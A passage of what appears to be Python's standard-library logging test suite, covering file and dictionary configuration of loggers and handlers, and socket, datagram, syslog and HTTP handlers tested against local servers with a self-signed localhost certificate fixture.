[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestTCPServer(addr, self.handle_socket,
0.01)
server.start()
server.ready.wait()
self.sock_hdlr = logging.handlers.SocketHandler('localhost',
server.port)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
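# SocketHandler frames each record as a 4-byte big-endian length prefix
# followed by a pickled dict of the record's attributes: read the prefix
# first, then the payload, and rebuild the record with makeLogRecord().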
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Kill the server
self.server.stop(2.0)
#The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertTrue(self.sock_hdlr.retryTime > now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestUDPServer(addr, self.handle_datagram, 0.01)
server.start()
server.ready.wait()
self.sock_hdlr = logging.handlers.DatagramHandler('localhost',
server.port)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # dummy value, used only to get the size of the 4-byte length prefix to strip
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestUDPServer(addr, self.handle_datagram,
0.01)
server.start()
server.ready.wait()
self.sl_hdlr = logging.handlers.SysLogHandler(('localhost',
server.port))
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
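# '<11>' is the syslog priority prefix: facility LOG_USER (1) * 8 + severity
# LOG_ERR (3) = 11. SysLogHandler also appends a NUL byte by default
# (append_nul=True), hence the trailing \x00 in the expected packet.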
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
PEMFILE = """-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDGT4xS5r91rbLJQK2nUDenBhBG6qFk+bVOjuAGC/LSHlAoBnvG
zQG3agOG+e7c5z2XT8m2ktORLqG3E4mYmbxgyhDrzP6ei2Anc+pszmnxPoK3Puh5
aXV+XKt0bU0C1m2+ACmGGJ0t3P408art82nOxBw8ZHgIg9Dtp6xIUCyOqwIDAQAB
AoGBAJFTnFboaKh5eUrIzjmNrKsG44jEyy+vWvHN/FgSC4l103HxhmWiuL5Lv3f7
0tMp1tX7D6xvHwIG9VWvyKb/Cq9rJsDibmDVIOslnOWeQhG+XwJyitR0pq/KlJIB
5LjORcBw795oKWOAi6RcOb1ON59tysEFYhAGQO9k6VL621gRAkEA/Gb+YXULLpbs
piXN3q4zcHzeaVANo69tUZ6TjaQqMeTxE4tOYM0G0ZoSeHEdaP59AOZGKXXNGSQy
2z/MddcYGQJBAMkjLSYIpOLJY11ja8OwwswFG2hEzHe0cS9bzo++R/jc1bHA5R0Y
i6vA5iPi+wopPFvpytdBol7UuEBe5xZrxWMCQQCWxELRHiP2yWpEeLJ3gGDzoXMN
PydWjhRju7Bx3AzkTtf+D6lawz1+eGTuEss5i0JKBkMEwvwnN2s1ce+EuF4JAkBb
E96h1lAzkVW5OAfYOPY8RCPA90ZO/hoyg7PpSxR0ECuDrgERR8gXIeYUYfejBkEa
rab4CfRoVJKKM28Yq/xZAkBvuq670JRCwOgfUTdww7WpdOQBYPkzQccsKNCslQW8
/DyW6y06oQusSENUvynT6dr3LJxt/NgZPhZX2+k1eYDV
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIICGzCCAYSgAwIBAgIJAIq84a2Q/OvlMA0GCSqGSIb3DQEBBQUAMBQxEjAQBgNV
BAMTCWxvY2FsaG9zdDAeFw0xMTA1MjExMDIzMzNaFw03NTAzMjEwMzU1MTdaMBQx
EjAQBgNVBAMTCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA
xk+MUua/da2yyUCtp1A3pwYQRuqhZPm1To7gBgvy0h5QKAZ7xs0Bt2oDhvnu3Oc9
l0/JtpLTkS6htxOJmJm8YMoQ68z+notgJ3PqbM5p8T6Ctz7oeWl1flyrdG1NAtZt
vgAphhidLdz+NPGq7fNpzsQcPGR4CIPQ7aesSFAsjqsCAwEAAaN1MHMwHQYDVR0O
BBYEFLWaUPO6N7efGiuoS9i3DVYcUwn0MEQGA1UdIwQ9MDuAFLWaUPO6N7efGiuo
S9i3DVYcUwn0oRikFjAUMRIwEAYDVQQDEwlsb2NhbGhvc3SCCQCKvOGtkPzr5TAM
BgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAMK5whPjLNQK1Ivvk88oqJqq
4f889OwikGP0eUhOBhbFlsZs+jq5YZC2UzHz+evzKBlgAP1u4lP/cB85CnjvWqM+
1c/lywFHQ6HOdDeQ1L72tSYMrNOG4XNmLn0h7rx6GoTU7dcFRfseahBCq8mv0IDt
IRbTpvlHWPjsSvHz0ZOH
-----END CERTIFICATE-----"""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
fd, fn = tempfile.mkstemp()
os.close(fd)
with open(fn, 'w') as f:
f.write(self.PEMFILE)
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(fn)
os.unlink(fn)
except ImportError:
sslctx = None
else:
sslctx = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client)
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
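# HTTPHandler url-encodes the record's attribute dict and sends it in the
# query string for GET requests and in the request body for POST requests.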
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: the 'py.warnings' logger has no handlers yet
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
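# The 'ext://' prefix used below tells dictConfig to resolve the rest of the
# string as an external (importable) object, so 'ext://sys.stdout' becomes the
# real sys.stdout object.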
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
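# config9a and config9b are incremental configs: with 'incremental': True,
# dictConfig only adjusts the levels of existing handlers (and the level and
# propagate settings of existing loggers) instead of replacing them.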
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
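# A 'cfg://' value is resolved against this same configuration dict, so
# 'cfg://handler_configs[hand1]' points at the mapping defined under
# 'handler_configs' below (test_baseconfig exercises the access syntax).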
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
